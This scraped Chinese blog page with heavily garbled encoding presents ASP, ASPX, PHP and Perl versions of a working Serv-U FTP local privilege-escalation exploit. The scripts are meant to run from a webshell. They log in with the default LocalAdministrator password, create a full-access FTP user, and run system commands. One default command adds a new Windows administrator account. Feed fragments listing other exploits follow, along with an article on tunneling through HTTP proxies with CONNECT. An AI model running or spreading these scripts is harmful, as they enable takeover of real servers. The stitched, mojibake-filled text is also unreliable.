    set c=Server.CreateObject("Microsoft.XMLHTTP")
    c.open "GET", "    c.send loginuser & loginpass & mt & deldomain & quit
    set session("c")=c
%>
<center>提权完毕,已执行了(jin)命o(h)Q?lt;br><font color=red><%=cmd%></font><br><br>
<input type=button value=" q回l箋(hu) " onClick="location.href='<%=gname()%>';">
</center>
<%
case else
on error resume next
    set a=session("a")
    set b=session("b")
    set c=session("c")
    a.abort
    Set a = Nothing
    b.abort
    Set b = Nothing
    c.abort
    Set c = Nothing
%>
<center><form method="post" name="goldsun">
<table width="494" height="163" border="1" cellpadding="0" cellspacing="1" bordercolor="#666666">
  <tr align="center" valign="middle">
    <td colspan="2">Serv-U 提升权限 ASP?Goldsun[at]84823714</td>
  </tr>
  <tr align="center" valign="middle">
    <td width="100">用户?</td>
    <td width="379"><input name="u" type="text" id="u" value="LocalAdministrator"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>口 令:(x)</td>
    <td><input name="p" type="text" id="p" value=" #l@$ak#.lk;0@P"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>端 口:(x)</td>
    <td><input name="port" type="text" id="port" value="43958"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>pȝ路径Q?lt;/td>
    <td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>命 令:(x)</td>
    <td><input name="c" type="text" id="c" value="cmd /c net user goldsun love /add & net localgroup administrators goldsun /add" size="50"></td>
  </tr>
 
  <tr align="center" valign="middle">
    <td colspan="2"><input type="submit" name="Submit" value="提交"> 
      <input type="reset" name="Submit2" value="重置">
      <input name="action" type="hidden" id="action" value="1"></td>
  </tr>
</table></form></center>
<% end select
function Gpath()
on error resume next
    err.clear
    set f=Server.CreateObject("Scripting.FileSystemObject")
    if err.number>0 then
 gpath="c:"
        exit function
    end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Function GName()
If request.servervariables("SERVER_PORT")="80" Then
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
Else
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
End If
End Function
%>


ASPX


<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>
<script runat="server">

'
' Love, where are you ?

Sub BTN_Start_Click(sender As Object, e As EventArgs)
Dim Usr As String = Text_Name.Text
Dim pwd As String = Text_PWD.Text
Dim Port As Int32 = Text_Port.Text
Dim Command As String = Text_cmd.Text

Dim LoginUser As String = "User " & Usr & vbcrlf
Dim LoginPass As String = "Pass " & pwd & vbcrlf
Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
Dim DelDomain As String = "-deleteDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
Dim Quit As String = "QUIT" & vbcrlf
Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf

'Dim client As New TcpClient
Dim tcpClient As New TcpClient()
Try
tcpClient.Connect("127.0.0.1", port)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient.ReceiveBufferSize = 1024
Dim networkStream As NetworkStream = tcpClient.GetStream()
Rec(networkStream)
Send(networkStream, LoginUser)
Rec(networkStream)
Send(networkStream, LoginPass)
Rec(networkStream)
Send(networkStream, MAINTENANCE)
Rec(networkStream)
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, NewDomain)
Rec(networkStream)
Send(networkStream, NewUser)
Rec(networkStream)
Dim tcpClient2 As New TcpClient()
Try
tcpClient2.Connect("127.0.0.1", 43859)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient2.ReceiveBufferSize = 1024
Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
Rec(networkStream2)
Send(networkStream2, "User lake" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "pass admin123" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "site exec " & Command & vbcrlf)
Rec(networkStream2)
tcpClient2.Close()
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, Quit)
Rec(networkStream)
tcpClient.Close()
End Sub


Sub Rec(o As Object)
If o.CanRead Then
Dim bytes(1024) As Byte
o.Read(bytes, 0, 1024)
Dim returndata As String = Encoding.ASCII.GetString(bytes)
response.Write("out:" & returndata & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

Sub Send(o As Object,data As String)
If o.CanWrite Then
Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
o.Write(sendBytes, 0, sendBytes.Length)
response.write("in: " & data & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

</script>
<html>
<head>
</head>
<body>
<form runat="server">
<p>
<asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2
admin by lake2</asp:Label>
</p>
<p>
<asp:Label id="Label2" runat="server" width="40px">Name</asp:Label>
<asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox>
<br />
<asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label>
<asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
<br />
<asp:Label id="Label4" runat="server" width="40px">Port</asp:Label>
<asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox>
<br />
<asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label>
<asp:TextBox id="Text_cmd" runat="server"></asp:TextBox>
</p>
<p>
<asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>
</p>
<p>
<hr />
<!-- insert content here -->
</p>
</form>
</body>
</html>


PHP


<?php
if(isset($_POST["Port"])&&isset($_POST["User"])&&isset($_POST["Pass"]))
{
  $sendbuf = "";
  $recvbuf = "";
  $domain = "-SETDOMAIN\r\n".
      "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".
      "-TZOEnable=0\r\n".
      " TZOKey=\r\n";
  $adduser = "-SETUSERSETUP\r\n".
      "-IP=0.0.0.0\r\n".
      "-PortNo=2121\r\n".
      "-User=Will_Be\r\n".
      "-Password=Will_Be\r\n".
      "-HomeDir=c:\\\r\n".
      "-LoginMesFile=\r\n".
      "-Disable=0\r\n".
      "-RelPaths=1\r\n".
      "-NeedSecure=0\r\n".
      "-HideHidden=0\r\n".
      "-AlwaysAllowLogin=0\r\n".
      "-ChangePassword=0\r\n".
      "-QuotaEnable=0\r\n".
      "-MaxUsersLoginPerIP=-1\r\n".
      "-SpeedLimitUp=0\r\n".
      "-SpeedLimitDown=0\r\n".
      "-MaxNrUsers=-1\r\n".
      "-IdleTimeOut=600\r\n".
      "-SessionTimeOut=-1\r\n".
      "-Expire=0\r\n".
      "-RatioUp=1\r\n".
      "-RatioDown=1\r\n".
      "-RatiosCredit=0\r\n".
      "-QuotaCurrent=0\r\n".
      "-QuotaMaximum=0\r\n".
      "-Maintenance=None\r\n".
      "-PasswordType=Regular\r\n".
      "-Ratios=None\r\n".
      " Access=c:\\|RELP\r\n";
  $deldomain="-DELETEDOMAIN\r\n".
      "-IP=0.0.0.0\r\n".
      " PortNo=2121\r\n";
  $sock = fsockopen("127.0.0.1", $_POST["Port"], &$errno, &$errstr, 10);
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "USER ".$_POST["User"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "PASS ".$_POST["Pass"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "SITE MAINTENANCE\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = $domain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = $adduser;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  echo "**********************************************************<br>";
  echo "Starting Exploit ...<br>";
  echo "**********************************************************<br>";
  $exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10);
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "USER Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "PASS Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "site exec ".$_POST["Command"]."\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: site exec</font> <font color=green>".$_POST["Command"]."</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  echo "**********************************************************<br>";
  echo "Starting Delete Domain ...<br>";
  echo "**********************************************************<br>";
  $sendbuf = $deldomain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  fclose($sock);
  fclose($exp);
}
?>
<html>
<head>
<meta http-equiv="Content-Type" c>
<title>Serv-U Local Exploit By Will_Be</title>
</head>

<body>
<form method="post">
LocalPort:
<input name="Port" type="text" id="Port" value="43958">
<br>
LocalUser:
<input name="User" type="text" id="User" value="LocalAdministrator">
<br>
LocalPass:
<input name="Pass" type="text" id="Pass" value="#l@$ak#.lk;0@P">
<br>
Command :
<input name="Command" type="text" id="Command" value="net user Will_Be heihei /add">
<br>
<input type="submit" name="Submit" value="提交">  
<input type="reset" name="Submit" value="重置">
</form>
</body>
</html>


Perl
Perl的默认安装\径是QC:\Perl
然后使用Q?br>perl 你的pl文g的\径?br>在WEBSHELL中的路径是这L(fng)Q?br>C:\perl\bin\perl 你的pl文g的\?
#!/usr/bin/perl
use IO::Socket;

binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

$addr = "127.0.0.1";
$ftpport = 21;
$adminport = 43958;
$adminuser = "LocalAdministrator";
$adminpass = '#l@$ak#.lk;0@P';
$user = "h4x0r";
$password = "123456";
$homedir = 'C:\\';
$dir = 'C:\\WINNT\\System32\\';


use IO::Socket::INET;

$sock = IO::Socket::INET->new("127.0.0.1:$adminport") || die "fail";

print "TEST<br><br>";

print $sock "USER $adminuser\r\n";
sleep (1);
print $sock "PASS $adminpass\r\n";
sleep(1);
print $sock "SITE MAINTENANCE\r\n";
sleep(1);
print $sock "-SETUSERSETUP\r\n";
print $sock "-IP=".$addr."\r\n";
print $sock "-PortNo=".$ftpport."\r\n";
print $sock "-User=".$user."\r\n";
print $sock "-Password=".$password."\r\n";
print $sock "-HomeDir=".$homedir."\r\n";
print $sock "-LoginMesFile=\r\n";
print $sock "-Disable=0\r\n";
print $sock "-RelPaths=0\r\n";
print $sock "-NeedSecure=0\r\n";
print $sock "-HideHidden=0\r\n";
print $sock "-AlwaysAllowLogin=0\r\n";
print $sock "-ChangePassword=1\r\n";
print $sock "-QuotaEnable=0\r\n";
print $sock "-MaxUsersLoginPerIP=-1\r\n";
print $sock "-SpeedLimitUp=-1\r\n";
print $sock "-SpeedLimitDown=-1\r\n";
print $sock "-MaxNrUsers=-1\r\n";
print $sock "-IdleTimeOut=600\r\n";
print $sock "-SessionTimeOut=-1\r\n";
print $sock "-Expire=0\r\n";
print $sock "-RatioUp=1\r\n";
print $sock "-RatioDown=1\r\n";
print $sock "-RatiosCredit=0\r\n";
print $sock "-QuotaCurrent=0\r\n";
print $sock "-QuotaMaximum=0\r\n";
print $sock "-Maintenance=System\r\n";
print $sock "-PasswordType=Regular\r\n";
print $sock "-Ratios=None\r\n";
print $sock " Access=".$homedir."|RWAMELCDP\r\n";
print $sock "QUIT\r\n";


@ret=<$sock>;
print "@ret";

close(STDERR);
close(STDOUT);
exit;


叶子 2007-08-04 15:17 发表评论
]]>Symantec 核心(j)驱动 symtdi.sys 本地权限提升漏洞http://www.shnenglu.com/elva/archive/2007/07/20/28428.html叶子叶子Fri, 20 Jul 2007 04:15:00 GMThttp://www.shnenglu.com/elva/archive/2007/07/20/28428.htmlhttp://www.shnenglu.com/elva/comments/28428.htmlhttp://www.shnenglu.com/elva/archive/2007/07/20/28428.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/28428.htmlhttp://www.shnenglu.com/elva/services/trackbacks/28428.html阅读全文

叶子 2007-07-20 12:15 发表评论
]]>Rav 核心(j)驱动 memscan.sys 本地权限提升漏洞http://www.shnenglu.com/elva/archive/2007/07/20/28427.html叶子叶子Fri, 20 Jul 2007 04:14:00 GMThttp://www.shnenglu.com/elva/archive/2007/07/20/28427.htmlhttp://www.shnenglu.com/elva/comments/28427.htmlhttp://www.shnenglu.com/elva/archive/2007/07/20/28427.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/28427.htmlhttp://www.shnenglu.com/elva/services/trackbacks/28427.html阅读全文

叶子 2007-07-20 12:14 发表评论
]]>Linux Kernel do_mremap VMA本地权限提升漏洞http://www.shnenglu.com/elva/archive/2007/06/01/25237.html叶子叶子Thu, 31 May 2007 19:10:00 GMThttp://www.shnenglu.com/elva/archive/2007/06/01/25237.htmlhttp://www.shnenglu.com/elva/comments/25237.htmlhttp://www.shnenglu.com/elva/archive/2007/06/01/25237.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/25237.htmlhttp://www.shnenglu.com/elva/services/trackbacks/25237.html阅读全文

叶子 2007-06-01 03:10 发表评论
]]>Kaspersky Anti-Virus q程删除L文g漏洞分析?qing)利用代?/title><link>http://www.shnenglu.com/elva/archive/2007/05/31/25224.html</link><dc:creator>叶子</dc:creator><author>叶子</author><pubDate>Thu, 31 May 2007 12:44:00 GMT</pubDate><guid>http://www.shnenglu.com/elva/archive/2007/05/31/25224.html</guid><wfw:comment>http://www.shnenglu.com/elva/comments/25224.html</wfw:comment><comments>http://www.shnenglu.com/elva/archive/2007/05/31/25224.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.shnenglu.com/elva/comments/commentRss/25224.html</wfw:commentRss><trackback:ping>http://www.shnenglu.com/elva/services/trackbacks/25224.html</trackback:ping><description><![CDATA[     摘要:   <a href='http://www.shnenglu.com/elva/archive/2007/05/31/25224.html'>阅读全文</a><img src ="http://www.shnenglu.com/elva/aggbug/25224.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.shnenglu.com/elva/" target="_blank">叶子</a> 2007-05-31 20:44 <a href="http://www.shnenglu.com/elva/archive/2007/05/31/25224.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>命o(h)批处理实现对3389d的日志记?http://www.shnenglu.com/elva/archive/2007/05/24/24732.html叶子叶子Wed, 23 May 2007 17:50:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/24/24732.htmlhttp://www.shnenglu.com/elva/comments/24732.htmlhttp://www.shnenglu.com/elva/archive/2007/05/24/24732.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/24732.htmlhttp://www.shnenglu.com/elva/services/trackbacks/24732.html阅读全文

叶子 2007-05-24 01:50 发表评论
]]>判断当前用户是否为系l管理员http://www.shnenglu.com/elva/archive/2007/05/14/24080.html叶子叶子Sun, 13 May 2007 16:56:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/14/24080.htmlhttp://www.shnenglu.com/elva/comments/24080.htmlhttp://www.shnenglu.com/elva/archive/2007/05/14/24080.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/24080.htmlhttp://www.shnenglu.com/elva/services/trackbacks/24080.html阅读全文

叶子 2007-05-14 00:56 发表评论
]]>2000下可执行文g修改自nhttp://www.shnenglu.com/elva/archive/2007/05/14/24079.html叶子叶子Sun, 13 May 2007 16:55:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/14/24079.htmlhttp://www.shnenglu.com/elva/comments/24079.htmlhttp://www.shnenglu.com/elva/archive/2007/05/14/24079.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/24079.htmlhttp://www.shnenglu.com/elva/services/trackbacks/24079.html阅读全文

叶子 2007-05-14 00:55 发表评论
]]>W一个支?000?003下完进行用户克隆的C源码(可在webshell里直接运?http://www.shnenglu.com/elva/archive/2007/05/14/24078.html叶子叶子Sun, 13 May 2007 16:49:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/14/24078.htmlhttp://www.shnenglu.com/elva/comments/24078.htmlhttp://www.shnenglu.com/elva/archive/2007/05/14/24078.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/24078.htmlhttp://www.shnenglu.com/elva/services/trackbacks/24078.html阅读全文

叶子 2007-05-14 00:49 发表评论
]]>MS Windows GDI Local Privilege Escalation Exploit (MS07-017) http://www.shnenglu.com/elva/archive/2007/05/08/23634.html叶子叶子Tue, 08 May 2007 08:49:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/08/23634.htmlhttp://www.shnenglu.com/elva/comments/23634.htmlhttp://www.shnenglu.com/elva/archive/2007/05/08/23634.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/23634.htmlhttp://www.shnenglu.com/elva/services/trackbacks/23634.html阅读全文

叶子 2007-05-08 16:49 发表评论
]]>带详l解释的冲击波原代码http://www.shnenglu.com/elva/archive/2007/05/08/23633.html叶子叶子Tue, 08 May 2007 08:43:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/08/23633.htmlhttp://www.shnenglu.com/elva/comments/23633.htmlhttp://www.shnenglu.com/elva/archive/2007/05/08/23633.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/23633.htmlhttp://www.shnenglu.com/elva/services/trackbacks/23633.html阅读全文

叶子 2007-05-08 16:43 发表评论
]]>HTTP Tunnelinghttp://www.shnenglu.com/elva/archive/2007/05/06/23526.html叶子叶子Sun, 06 May 2007 08:51:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/06/23526.htmlhttp://www.shnenglu.com/elva/comments/23526.htmlhttp://www.shnenglu.com/elva/archive/2007/05/06/23526.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/23526.htmlhttp://www.shnenglu.com/elva/services/trackbacks/23526.htmlIntroduction

HTTP Tunneling

HTTP is a text-based protocol to retrieve Web pages through a Web browser. Mostly, if you are on a LAN connection, you are behind a proxy server; this proxy server has one HTTP proxy running on some defined port. In your Internet Explorer's Connection option, you specify LAN settings as required. This proxy server is definitely running on a text-based protocol, and you can only get HTTP-related data from the outside network, right!! Well, there is a small loophole from which you can go through HTTP and connect to the outside world and get any data you want in binary protocol, or even your own protocol. It's through HTTPS.

HTTPS Explanation

In HTTPS, data is transferred from browser to server and server to browser in a secure manner. It's a binary protocol; when it goes through a proxy, the proxy doesn't understand anything. The proxy just allows a binary stream to open and lets both server and client exchange the data. Now, we can fool the proxy server and connect to any server and exchange data. The proxy server will think that we are doing some secure HTTP session.

For HTTPS, your browser connects to a proxy server and sends a command:

CONNECT neurospeech.com:443 HTTP/1.0 <CR><LF>
HOST neurospeech.com:443<CR><LF>
[... other HTTP header lines ending with <CR><LF> if required]>
<CR><LF>    // Last Empty Line

Then, the proxy server treats this as some HTTP Secure Session, and opens a binary stream to the required server and port as defined. If a connection is established, the proxy server returns the following response:

HTTP/1.0 200 Connection Established<CR><LF>
[.... other HTTP header lines ending with <CR><LF>..
ignore all of them]
<CR><LF>    // Last Empty Line

Now, the browser is connected to the end server and can exchange data in both a binary and secure form.

How to Do This

Now, it's your program's turn to fool the proxy server and behave as Internet Explorer behaves for Secure HTTP.

  1. Connect to Proxy Server first.
  2. Issue CONNECT Host:Port HTTP/1.1<CR><LF>.
  3. Issue <CR><LF>.
  4. Wait for a line of response. If it contains HTTP/1.X 200, the connection is successful.
  5. Read further lines of response until you receive an empty line.
  6. Now, you are connected to the outside world through a proxy. Do any data exchange you want.

Sample Source Code

Collapse
  // You need to connect to mail.yahoo.com on port 25
// Through a proxy on 192.0.1.1, on HTTP Proxy 4480
// CSocketClient is Socket wrapping class
// When you apply operator << on CString, it writes CString
// To Socket ending with CRLF
// When you apply operator >> on CString, it receives
// a Line of response from socket until CRLF
try
{
CString Request,Response;
CSocketClient Client;
Client.ConnectTo("192.0.1.1",4480);
// Issue CONNECT Command
Request = "CONNECT mail.yahoo.com:25 HTTP/1.0";
Client<<Request;
// Issue empty line
Request = "";
Client<<Request;
// Receive Response From Server
Client>>Response;
// Ignore HTTP Version
int n = Response.Find(' ');
Response = Response.Mid(n+1);
// Http Response Must be 200 only
if(Response.Left(3)!="200")
{
// Connection refused from HTTP Proxy Server
AfxMessageBox(Response);
}
// Read Response Lines until you receive an empty line.
do
{
Client>>Response;
if (Response.IsEmpty())
break;
}while (true);
// Coooooooool.... Now connected to mail.yahoo.com:25
// Do further SMTP Protocol here..
}
catch (CSocketException * pE)
{
pE->ReportError();
}

Library Source Code

The Dns.h file contains all DNS-related source code. It uses other libraries, as SocketEx.h, SocketClient.h, and NeuroBuffer.h.

CSocketEx

Socket functions as a wrapper class. (CSocket is very heavy and unreliable if you don't have the exact idea of how it works.) All the functions are of the same name as CSocket. You can use this class directly.

CSocketClient

Derived from CSocketEx and throws proper exceptions with details of Winsock errors. It defines two operators, >> and <<, for easy sending and receiving; it also changes network to host and host to network order of bytes if required.

CHttpProxySocketClient

Derived from CSocketClient, you can call the SetProxySettings(ProxyServer,Port) method and set proxy settings. Then, you can connect to the desired host and port as you need. The ConnectTo method is overridden, and it automatically implements an HTTP proxy protocol and gives you a connection without any hassle.

How to Use CHttpProxySocketClient

Collapse
  // e.g. You need to connect to mail.yahoo.com on port 25
// Through a proxy on 192.0.1.1, on HTTP Proxy 4480
// CSocketClient is Socket wrapping class
// When you apply operator << on CString, it writes CString
// To Socket ending with CRLF
// When you apply operator >> on CString, it receives
// Line of response from socket until CRLF
try
{
CHttpProxySocketClient Client;
Client.SetProxySettings("192.0.1.1",1979);
// Connect to server mail.yahoo.com on port 25
Client.ConnectTo("mail.yahoo.com",25);
// You now have access to mail.yahoo.com on port 25
// If you do not call SetProxySettings, then
// you are connected to mail.yahoo.com directly if
// you have direct access, so always use
// CHttpProxySocketClient and no need to do any
// extra coding.
}
catch(CSocketException * pE) {
pE->ReportError();
}

Note: I usually don't program in the form of .h and .cpp different files, because using them the next time somewhere else is a big problem because you must move both files here and there. So, I put all the code in my .h file only; I don't write to the .cpp file unless it's required. You need to copy only the SocketEx.h, SocketClient.h, and HttpProxySocket.h files into your project's directory, and add line:

#include "HttpProxySocket.h"

after your:

#if !defined(.....

and so forth code of your Visual Studio-generated file. If you put anything above this, you will get n number of errors.

 



叶子 2007-05-06 16:51 发表评论
]]>q程桌面安全全解Q下Q?/title><link>http://www.shnenglu.com/elva/archive/2007/05/06/23524.html</link><dc:creator>叶子</dc:creator><author>叶子</author><pubDate>Sun, 06 May 2007 08:36:00 GMT</pubDate><guid>http://www.shnenglu.com/elva/archive/2007/05/06/23524.html</guid><wfw:comment>http://www.shnenglu.com/elva/comments/23524.html</wfw:comment><comments>http://www.shnenglu.com/elva/archive/2007/05/06/23524.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.shnenglu.com/elva/comments/commentRss/23524.html</wfw:commentRss><trackback:ping>http://www.shnenglu.com/elva/services/trackbacks/23524.html</trackback:ping><description><![CDATA[     摘要:   <a href='http://www.shnenglu.com/elva/archive/2007/05/06/23524.html'>阅读全文</a><img src ="http://www.shnenglu.com/elva/aggbug/23524.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.shnenglu.com/elva/" target="_blank">叶子</a> 2007-05-06 16:36 <a href="http://www.shnenglu.com/elva/archive/2007/05/06/23524.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>q程桌面安全全解(?http://www.shnenglu.com/elva/archive/2007/05/06/23523.html叶子叶子Sun, 06 May 2007 08:35:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/06/23523.htmlhttp://www.shnenglu.com/elva/comments/23523.htmlhttp://www.shnenglu.com/elva/archive/2007/05/06/23523.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/23523.htmlhttp://www.shnenglu.com/elva/services/trackbacks/23523.html阅读全文

叶子 2007-05-06 16:35 发表评论
]]> ɫav˾þô߽ӰԺ| ޾ƷƷþ99һ| 2021Ʒҹþ| 2022Ʒþþþ| þþƷ5555| þˬˬ| ɫʹþۺ | ھƷþþĻ| þþþþavѿƬ| Ʒþþþù| þþþþþòҰ¸߳| Ʒݾþþþø| þþƷ| ŷպþĻ| ޹һɾþþƷۺ| þerƵᆱƷ| 볬鱬Ļþ| һɫþۺϺݺƪ| þþ91뾫ƷHD| 㽶þҹɫƷС˵| þۺϾþ߾Ʒ| þþþþԻAV| ޹ƷۺϾþ| þþþһëþþ| ܻƺ۵վþmimiɫ| 99þþþþѿ| 91ɫۺϾþѷ| þþþһƷɫav| þþƷþý | ޳ɫWWWþվ| 91鶹Ʒ91þþ| þþþþùƷŮ| þõӰһ| þerƷѹۿ2| Ʒþþþþ޾Ʒ | þþƷAVDz18| þþƷ5555| þĻԴվ| þþƷhþþƷ帣ӰԺ1421| 91þþƷ˾þ| ۿþ|